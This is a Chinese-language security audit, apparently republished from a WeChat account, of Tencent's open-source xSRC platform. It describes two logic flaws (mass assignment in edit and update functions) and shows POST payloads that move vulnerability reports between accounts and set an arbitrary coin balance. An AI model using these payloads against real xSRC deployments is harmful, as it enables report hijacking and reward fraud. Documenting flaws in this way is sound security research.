01 项目介绍
可支持合作伙伴轻松构建SRC平台,省去大量开发运维工作,并支持个性化功能及页面设置,企业数据自主掌控,安全可靠。
腾讯xSRC是腾讯安全应急响应中心(TSRC)面向合作伙伴推出的用于快速构建企业安全应急响应中心SRC的开放平台,合作伙伴仅需简单几步配置即可完成SRC平台构建,省去了开发、运维的工作量,能够更好的专注于漏洞奖励和处置、鼓励白帽子报告漏洞等SRC运营工作。
开源项目地址:
https://hub.docker.com/r/xsrc/xsrc
02 审计过程
最新版本程序目录
确定开发框架为:thinkphp
03 逻辑缺陷一
所在文件路径
Application/User/Controller/PostController.class.php
133-185行 函数edit
sql链式查询对数据没有严格校验发现此处数据库user_id字段可控且没有限制 可能导致此处将提交的漏洞报告转移到其他账户
04 逻辑缺陷二
116-158行 函数update中
导致对数据库用户表member所有字段可进行修改后台原本无法修改的数据也可以进行修改
05 测试逻辑漏洞一
首先后台创建两个账号
用户名密码分别为qingshan/qingshan.和test/qingshan.
使用test账户提交个漏洞
http://**************/user.php?m=&c=post&a=edit&rid=1直接post发送数据包
cate_id=1&content=正文&title=Web服务漏洞&user_id=1请求完毕之后在后台可以发现用户提交的漏洞成功转移到qingshan的账户上
06 测试逻辑漏洞二
构造的payload 此处增加jinbi字段修改
username=qingshan&email=qingshan&password=&status=1&id=1&token=为后台登录token&realname=暂无&address=暂无&idcode=暂无&bankcode=暂无&tel=暂无&jinbi=任意金额
原文始发于微信公众号(梅苑安全学术):xSRC开源建站系统漏洞审计
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论